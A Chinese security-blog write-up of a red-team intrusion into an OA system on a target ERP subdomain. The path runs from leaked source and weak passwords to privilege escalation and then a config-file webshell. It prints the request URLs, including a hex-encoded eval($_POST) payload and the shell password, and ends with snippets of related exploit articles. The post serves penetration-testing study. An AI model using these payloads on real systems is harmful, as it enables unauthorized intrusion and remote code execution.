[攻防实战]爽文一把梭getshell

VSole2023-05-05 09:54:03

前言

不是星标不推送文章了。

师傅也不想吧~

快把极梦C设置成星标吧。

信息收集

目标为jmc.com

收集到了一个子域名 erp.jmc.com子域名

发现子域名存在一个源码泄漏漏洞。

其中oa.zip是源码。

其余都是一个登录页面。

这里重点是oa的登录页面。

oa是信乎OA,根据oa.zip泄漏.找到了公司名单。存在几个弱口令。


第一步查看历史漏洞。

发现泄漏出来的漏洞,如果想getshell全部都在后台。

后台文件上传getshell

后台配置文件getshell

不过都需要是管理员的情况下。

如何获取管理员呢?这里查看历史漏洞没有发现什么有价值的。‍‍‍

这里利用了独家秘方的一个越权漏洞。修改+新建把普通用户改成了管理员。

PS:经过本地测试,这里修改后普通用户会存在一些bug。谨慎使用!‍‍‍‍‍‍‍‍‍

上传webshell就简单了。--网上很多教程。‍‍‍‍

这里利用了后台配置文件上传进行getshell,‍‍‍‍‍‍

因为是写入了配置文件,对目标页面会有危险。‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍

在写入后抓紧复原。

/index.php?a=changestyle&m=geren&d=system&ajaxbool=true&style=21,id=1,name=0x610A6576616C28245F504F53545B315D293B2F2F

清除COOKIES再登录系统 --> 发包:/index.php?a=savecong&m=cog&d=system&ajaxbool=true&rnd=705961

根据教材走,这里就已经成功上传了webshell。shell地址:http://erp.jmc.com/密码为1

然后上传一个新的马,恢复配置文件。

无法进行命令执行。

全部乱码。修改编码也没啥用。

这里要不把所有的webshell管理工具都尝试一遍,要不就上传php文件尝试。

这里选择了上传phpinfo,发现并未禁用参数。

又上传了system(whoami),发现也是可以成功执行的。

然后利用冰蝎成功命令执行。

漏洞webshell
本作品采用《CC 协议》,转载必须注明作者和本文链接
文件上传前端JS 防护,通过抓包修改,或插件js禁用来绕过。后端黑名单上传陌生后缀 .php3 php5上传配置文件 .htaccess通过 双写 ,大小写,基于windows 特性
​云安全风险情报
2023-11-21 11:06:10
当前各行业基础设施和服务向云逐渐迁移,随之而来针对云上资产的攻击也不断出现,掌握云上风险态势成为企业安全的重要环节。
1 漏洞概述 VMware vRealize Operations 可在由 AI 提供支持的统一平台中针对私有云、混合云和多云环境提供自动配置 IT 运维管理套件。本次安全更新修复了一处服务端请求伪造漏洞,一处任意文件上传漏洞。未经身份验证的攻击者通过访问特定的api传入恶意数据,最终在目标服务器上触发漏洞漏洞利用 3 组合利用=RCE 思路是ssrf获取Authorization然后配合文件上传漏洞getshell。复现ssrf的时候已经接收到了Authorization,然后就利用文件上传漏洞webshell
Vcenter一般指VMware vCenter Server,其提供了一个可伸缩、可扩展的平台,为虚拟化管理奠定了基础,可集中管理VMware vSphere环境,与其他管理平台相比,极大地提高了IT管理员对虚拟环境的控制,Vcenter可以使管理员从一个位置深入了解虚拟基础架构的集群、主机、虚拟机、存储、客户操作系统和其他关键组件等所有信息。
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
部分getshell漏洞汇总
2022-07-20 10:12:45
即可未授权访问console后台,但是权限比较低备注:此处会出现个问题,在复现的环境中直接拼接
简介WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
OneEDR 2.5版本让恶意Webshell“现原形”
VSole
网络安全专家